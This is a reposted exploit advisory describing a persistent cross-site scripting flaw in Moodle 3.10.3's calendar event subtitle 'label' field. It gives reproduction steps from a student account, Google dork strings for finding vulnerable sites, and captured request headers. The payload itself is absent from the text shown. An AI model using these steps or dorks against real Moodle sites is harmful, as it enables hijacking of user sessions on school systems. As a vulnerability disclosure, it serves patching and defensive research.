Moodle 3.10.3 – ‘label’ Persistent Cross Site Scripting – Digitalmunition

Exploit/Advisories spider-orange.png

Published on March 27th, 2021 📆 | 5348 Views ⚑


Moodle 3.10.3 – ‘label’ Persistent Cross Site Scripting

# Exploit Title: Moodle 3.10.3 - 'label' Persistent Cross Site Scripting
# Date: 25.03.2021
# Author: Vincent666 ibn Winnie
# Software Link:
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or calendar/view.php?view=month

Choose a role : Student (example)
Open calendar :

Create new event:
Event Title "Test"
Description :Choose Insert Video File and choose Video:
Video Source Url you can paste video link from youtube

And open Subtitles and Captions:
Subtitle track URL use video link from youtube
Field Label : There is we can use xss code:

or try in base64

Insert Media and save this.
Open event and get stored xss.


Host: school.localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 996
Origin: https://school.localhost
Connection: keep-alive
Referer: https://school.localhost/calendar/view.php?view=month
Cookie: MoodleSession=4ea0036558425526decc096ed375b886;


Source link

Tagged with:

Leave a Reply